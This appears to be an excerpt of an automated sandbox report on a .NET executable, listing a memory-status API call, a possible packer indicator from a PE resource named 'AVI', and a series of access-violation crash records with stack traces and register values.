Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 27, 2023, 10:24 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (42 events)

Time & API	Arguments	Status
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x8cd2d1 0x8cd0d3 0x8c7ad8 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8cd408 registers.esp: 1829492 registers.edi: 1829544 registers.eax: 0 registers.ebp: 1829556 registers.edx: 5581096 registers.ebx: 1830988 registers.esi: 38339056 registers.ecx: 0	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bc88bc 0x4bc8152 0x4bc8025 0x4bc68db 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828020 registers.edi: 1828364 registers.eax: 0 registers.ebp: 1828028 registers.edx: 0 registers.ebx: 1830988 registers.esi: 39230036 registers.ecx: 40356332	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bc88bc 0x4bc8152 0x4bc803d 0x4bc68db 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828020 registers.edi: 1828364 registers.eax: 0 registers.ebp: 1828028 registers.edx: 0 registers.ebx: 1830988 registers.esi: 39230036 registers.ecx: 37981484	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bc88bc 0x4bc8152 0x4bc803d 0x4bc68db 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828020 registers.edi: 1828364 registers.eax: 0 registers.ebp: 1828028 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37966524 registers.ecx: 39217048	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bcd45e 0x4bccd19 0x4bc8025 0x4bc6bc4 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1827996 registers.edi: 1828388 registers.eax: 0 registers.ebp: 1828004 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37966524 registers.ecx: 40525888	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bcd45e 0x4bccd19 0x4bc803d 0x4bc6bc4 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1827996 registers.edi: 1828388 registers.eax: 0 registers.ebp: 1828004 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37966524 registers.ecx: 41872640	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bcd45e 0x4bccd19 0x4bc803d 0x4bc6bc4 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1827996 registers.edi: 1828388 registers.eax: 0 registers.ebp: 1828004 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37966524 registers.ecx: 43219392	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bcdd8a 0x4bcd731 0x4bc8025 0x4bc6cdc 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828048 registers.edi: 1828388 registers.eax: 0 registers.ebp: 1828056 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37966524 registers.ecx: 38493424	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bcdd8a 0x4bcd731 0x4bc803d 0x4bc6cdc 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828048 registers.edi: 1828388 registers.eax: 0 registers.ebp: 1828056 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37944368 registers.ecx: 39887360	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bcdd8a 0x4bcd731 0x4bc803d 0x4bc6cdc 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828048 registers.edi: 1828388 registers.eax: 0 registers.ebp: 1828056 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37944368 registers.ecx: 41281008	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bce49c 0x4bcdef9 0x4bc8025 0x4bc6de2 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828080 registers.edi: 1828388 registers.eax: 0 registers.ebp: 1828088 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37944368 registers.ecx: 42674792	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bce49c 0x4bcdef9 0x4bc803d 0x4bc6de2 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828080 registers.edi: 1828388 registers.eax: 0 registers.ebp: 1828088 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37944368 registers.ecx: 39229088	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bce49c 0x4bcdef9 0x4bc803d 0x4bc6de2 0x4bc5a71 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828080 registers.edi: 1828388 registers.eax: 0 registers.ebp: 1828088 registers.edx: 0 registers.ebx: 1830988 registers.esi: 37944368 registers.ecx: 40625360	1
__exception__ July 27, 2023, 10:25 a.m.	stacktrace: 0x4bcc950 0x4bcf823 0x4bcedce 0x4bc5ac9 0x8cd9ff 0x8c7c1d 0x8c72d3 0x8c3c6b 0x8c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72eb2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ec264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ec2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72f774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72f77610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73001dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73001e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73001f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7300416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4bcc993 registers.esp: 1828900 registers.edi: 1829164 registers.eax: 0 registers.ebp: 1828908 registers.edx: 0 registers.ebx: 1830988 registers.esi: 41194268 registers.ecx: 41201244	1
